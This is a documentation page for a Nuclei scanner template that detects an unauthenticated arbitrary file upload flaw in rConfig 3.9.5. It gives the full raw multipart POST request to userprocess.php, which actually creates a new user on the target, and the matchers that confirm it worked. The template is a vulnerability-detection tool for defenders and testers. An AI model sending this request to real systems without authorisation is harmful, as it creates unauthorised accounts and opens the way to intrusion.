Skip to content
Nuclei Templates

rConfig 3.9.5 - Arbitrary File Upload

ID: rconfig-file-upload

Severity: high

Author: dwisiswant0

Tags: rconfig,rce,edb,file-upload,instrusive,intrusive

Description

Section titled “Description”

rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

YAML Source

Section titled “YAML Source”
id: rconfig-file-upload


info:
  name: rConfig 3.9.5 - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    rConfig 3.9.5 is susceptible to an arbitrary file upload via the userprocess.php endpoint. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
    - https://www.exploit-db.com/exploits/48878
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-434
    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"rConfig"
    product: rconfig
    vendor: rconfig
  tags: rconfig,rce,edb,file-upload,instrusive,intrusive


http:
  - raw:
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb
        Cookie: PHPSESSID={{randstr}}


        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="username"


        {{randstr}}
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="passconf"


        Testing1@
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="password"


        Testing1@
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="email"


        test@{{randstr}}.tld
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="editid"




        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="add"


        add
        --01b28e152ee044338224bf647275f8eb
        Content-Disposition: form-data; name="ulevelid"


        9
        --01b28e152ee044338224bf647275f8eb--


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "User {{randstr}} successfully added to Database"
        part: body


      - type: status
        status:
          - 302
# digest: 4a0a0047304502206d8690af5c0a6d7ef1e3f9dba42383d3c42ccbb2855a79c5d33d286853ce916d02210081fbd01ac2211bb8b526756b00b6edb26f436250f1f82fee5f4d8f212db05d16:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/rconfig-file-upload.yaml"

View on Github